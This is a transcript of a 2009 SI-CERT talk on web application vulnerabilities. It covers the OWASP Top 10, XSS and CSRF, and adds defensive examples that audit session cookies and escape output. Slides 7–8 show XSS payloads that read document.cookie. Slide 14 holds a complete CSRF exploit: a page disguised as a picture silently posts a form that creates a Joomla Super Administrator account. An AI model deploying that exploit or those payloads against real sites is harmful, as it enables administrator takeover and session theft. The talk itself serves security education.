2009 Web Application Vulnerabilities
Slide 1
Web application vulnerabilities
Tadej Hren, SI-CERT (ARNES)
Slide 2
WEB APPLICATION
Slide 3
VULNERABLE APPLICATION
Slide 4
Top 10 (the OWASP Top 10, 2007 edition)
• Cross Site Scripting (XSS)
• Injection Flaws
• Malicious File Execution (RFI)
• Insecure Direct Object Reference
• Cross Site Request Forgery (CSRF)
• Information Leakage and Improper Error Handling
• Broken Authentication and Session Management
• Insecure Cryptographic Storage
• Insecure Communications
• Failure to Restrict URL Access
• ...
Slide 5
How does the web work?
google.com
GET /index.html
HTTP/1.x 200 OK
<html><head><title>Google</title>... <img src="/images/logo.png"/><input type=submit value="Google Search">...</html>
GET /images/logo.png
HTTP/1.x 200 OK
(binary PNG image data)
Slide 6
Anyone for a cookie?
gmail.com
POST /accounts/Login?service=mail
Email=tadej.hren&Passwd=blabla
HTTP/1.x 200 OK
Set-Cookie: SID=DQA4V8lfg4dtusv
<html><head>...
GET /mail/sendmail?service=mail
Cookie: SID=DQA4V8lfg4dtusv
HTTP/1.x 200 OK
<html><head>...
user:tadej.hren
Cookie:DQA4V8…
…
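The exchange above shows the server issuing a bare session cookie (Set-Cookie: SID=...) and then mapping that cookie back to the logged-in user on every later request. Whether that cookie can be stolen by script, or leaked over plain HTTP, depends on attributes the slide's header does not carry. The following is an added example, not code from the slides: a small Set-Cookie parser and an audit of the attributes a session cookie should have. The header string is copied from the slide; the hardened variant and the flag policy are this example's own assumptions.

```javascript
// Added example (not from the original slides): parse a Set-Cookie header and
// report the hardening attributes a session cookie should carry.

// Split one Set-Cookie header value into name, value and a lower-cased attribute map.
// Attributes without a value (Secure, HttpOnly) are stored as `true`.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name, ...rest] = parts[0].split('=');
  const attrs = {};
  for (const attr of parts.slice(1)) {
    const eq = attr.indexOf('=');
    const key = (eq === -1 ? attr : attr.slice(0, eq)).trim().toLowerCase();
    attrs[key] = eq === -1 ? true : attr.slice(eq + 1).trim();
  }
  return { name: name.trim(), value: rest.join('='), attrs };
}

// Audit policy (assumption of this example):
//  - HttpOnly: document.cookie, and therefore an injected script, cannot read it.
//  - Secure: the browser never sends it over plain HTTP.
//  - SameSite=Lax or Strict: not attached to cross-site POSTs, which blunts CSRF.
//    (SameSite did not exist in 2009 browsers; it is listed for today's checklists.)
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!('httponly' in c.attrs)) findings.push('missing HttpOnly: readable via document.cookie');
  if (!('secure' in c.attrs)) findings.push('missing Secure: sent over plain HTTP');
  const sameSite = typeof c.attrs.samesite === 'string' ? c.attrs.samesite.toLowerCase() : null;
  if (sameSite !== 'lax' && sameSite !== 'strict') {
    findings.push('SameSite not Lax/Strict: attached to cross-site requests');
  }
  return { name: c.name, findings };
}

// Constructed inputs: the header as shown on the slide, and a hardened version of it.
const SLIDE_COOKIE = 'SID=DQA4V8lfg4dtusv';
const HARDENED_COOKIE = 'SID=DQA4V8lfg4dtusv; Path=/; Secure; HttpOnly; SameSite=Lax';

console.log(auditSessionCookie(SLIDE_COOKIE));    // three findings
console.log(auditSessionCookie(HARDENED_COOKIE)); // no findings
```

Run it with node; the slide's cookie produces three findings, the hardened one none. The same parser can be pointed at a live response by reading `res.headers['set-cookie']` in a Node client.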
Slide 7
JavaScript
<script>document.cookie</script>
Slide 8
JavaScript
<script>alert("Important notice!")</script>
Slide 9
Cross Site Scripting (XSS)
Exploits the trust the user has in the web site
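The two payloads on the previous slides only run because a page on the trusted site copies attacker-controlled text into its HTML unchanged. The following is an added example, not from the slides or any particular application: a reflected page rendered once without and once with output escaping, checked against the slide's own payloads. The page template, function names and the crude script-tag check are this example's assumptions.

```javascript
// Added example (not from the original slides): reflected XSS and its fix.

// Escape the characters that let text break out of an HTML text node or a
// double-quoted attribute value. Output escaping is context-specific; this table
// covers HTML body and attribute contexts only, not JavaScript or URL contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Vulnerable: the search term taken from the request is pasted straight into the page,
// so '<script>document.cookie</script>' becomes part of the site's own markup.
function renderResultsVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Hardened: the same page, with the untrusted value escaped for the context it lands in.
function renderResultsSafe(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Demo check only: does the rendered page contain a script tag the author did not write?
// (A real browser parses far more loosely; do not use this as a filter.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payloads, the ones shown on slides 7 and 8.
const PAYLOAD_COOKIE = '<script>document.cookie</script>';
const PAYLOAD_ALERT = '<script>alert("Important notice!")</script>';

console.log(renderResultsVulnerable(PAYLOAD_COOKIE)); // script tag survives
console.log(renderResultsSafe(PAYLOAD_COOKIE));       // rendered as literal text
```

The fix is at the output, not the input: the same value may need a different encoding when it is placed inside a JavaScript string or a URL, so escape where the data lands, not where it arrives.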
Slide 10
XSS
DEMO
Slide 11
Cross Site Request Forgery (CSRF)
Exploits the trust the web site has in the user
Slide 12
CSRF
(diagram) WEB SITE | BROWSER | USER
Authenticated session
X
ACTION
Slide 13
CSRF
DEMO
Slide 14
A picture?
<html><body>
<script type="text/javascript">
// Fires as soon as the page has loaded: the victim only has to view the page.
window.onload = function() {
  // Target: the administrator back-end of the demo Joomla site (here on localhost).
  var url = "http://localhost/slojoomla/administrator/index2.php";
  // gid 25 is the Super Administrator group in Joomla 1.x.
  var gid = 25;
  var user = 'ub3rh4cker';
  var pass = 'password';
  var email = '[email protected]'; // the address is masked in the hosted transcript
  // The same fields the legitimate com_users "save" form posts.
  var param = {
    name: user, username: user, email: email, password: pass,
    password2: pass, gid: gid, block: 0, option: 'com_users',
    task: 'save', sendEmail: 1
  };
  // Build a hidden form; on submit the browser attaches the admin's session cookie.
  var form = document.createElement('form');
  form.action = url; form.method = 'post';
  form.target = 'hidden'; form.style.display = 'none';
  for (var i in param) {
    try {
      // old IE: the name attribute has to be given at creation time
      var input = document.createElement('<input name="'+i+'">');
    } catch(e) {
      // other browsers
      var input = document.createElement('input');
      input.name = i;
    }
    input.setAttribute('value', param[i]);
    form.appendChild(input);
  }
  document.body.appendChild(form);
  // The response lands in the hidden iframe; the victim sees only the picture.
  form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="clip.png"></body></html>
Slide 15
XSS+CSRF
Anica
Bine
Cene
Davor
Erika
Filip
Grega
Haso
Ivan
Ivan
Joži
Karmen
Luka
Mitja
Nina
Oma
Petra
Rado
Suljo
Šime
Tedi
Urbi
Vera
Zarja
Željko
Slide 16
VULNERABLE APPLICATION
Slide 17
VULNERABLE APPLICATION
Slide 18
Slide 19
Protection?
IE8
Firefox with NoScript
Slide 20
Slide 21
Questions?
• http://www.cert.si
• http://www.arnes.si/si-cert
• http://www.twitter.com/sicert